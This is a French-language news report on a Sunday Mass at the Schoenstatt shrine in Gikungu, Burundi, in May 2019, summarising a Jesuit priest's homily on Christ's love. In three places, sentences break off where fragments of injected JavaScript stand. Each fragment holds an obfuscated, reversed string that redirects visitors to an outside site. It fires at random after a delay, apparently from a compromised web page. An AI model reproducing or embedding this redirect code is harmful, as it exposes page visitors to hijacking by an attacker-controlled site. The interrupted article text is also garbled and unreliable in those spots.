La célébration du cinquième dimanche de Pâques, le 19mai 2019 au Sanctuaire marial de Schoenstatt Mont Sion Gikungu, a été dirigée par le Père Védaste NKESHIMANA un des Pères de la compagnie de Jésus, une messe qui a débuté 9heures et demie dans l’Eglise de la Sainte Trinité. Il a été en concélébration avec le Père Longin NTIRANYIBAGIRA, un des Pères de Schoenstatt, qui a souhaité la bienvenue à tout un chacun et plus spécialement au célébrant.
« Ce que nous avons hérité de Jésus, c’est l’Amour. Et c’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dommage à voir comment nous nous comportons les uns envers les autres, notre amour change de temps en temps et nous le souillons par des choses impures. Dans cette sainte Messe, prions pour que Jésus purifie notre amour, a introduit le consacrant.
Dans son homélie, il a fait connaitre que l’Amour de Jésus vient du ciel, parce que malgré la trahison de certains d’entre les siens, il n’a pas cessé d’aimer, il a continué à se manifester comme un Dieu qui aime.
Selon lui, où réside l’Amour de Jésus, c’est dans l’obéissance envers son Père, par le fait qu’il a accepté que la volonté du Puissant s’accomplisse. Il a aussi rappelé que l’Amour du Christ est inconditionnel parce qu’il ne différencie les gens, il accueille tous dans leur dissemblance. L’Amour de Jésus ne cherche pas d’avantages, ce qui compte pour lui, c’est le bien-être des enfants de son Père. « Et nous autres, a-t-il dit, nous sommes emportés par les richesses d’ici-bas, en voulant obtenir quelque chose de nos amis pour leurs rendre service. »
L’Amour de Jésus est humble, ajoute-il. Quitter le ciel vers la terre, c’est un grand signe d’une si profonde humilité. Cela nous enseigne que l’Amour vrai est humble, et Jésus qui a accepté toute sorte de souffrance devient notre exemple. L’Amour que Jésus nous enseigne n’est pas celui de nous laisser admirer par d’autres et nous appeler responsables sans rien faire. »
Le Prêtre a signalé que, ce que le Christ nous recommande de faire n’est pas du tout difficile, parce que selon lui, il y a ceux qui essayent : ceux qui aident les pauvres et partagent avec eux le peu qu’ils ont, les parents qui manifestent l’amour envers leurs propres enfants qui sont handicapés ou bien avec d’autres défauts, les enfants qui accompagnent leurs parents âgés. Ceux qui font dignement leur travail sans plaintes ni demande de bénéfice.
Le célébrant n’a pas publié d’informer que la protection de l’environnement est inclue dans cet amour qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit caractériser les enfants de Dieu, parce que, dit-il, l’environnement est une maison commune, comme l’a dit sa sainteté le Pape François. »
Si nous voulons bâtir le Burundi nouveau, nous sommes appelés à vivre cet amour, petit à petit nous y arriverons et Jésus va nous aider en envoyant sur nous son Esprit. Prions les uns pour les autres, afin que le Seigneur nous purifie et consolide l’amour que lui-même a déposé en nous.
La joie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dominicale a caractérisé tous les participants du début à la fin de cette célébration.
Brigitte IRAKOZE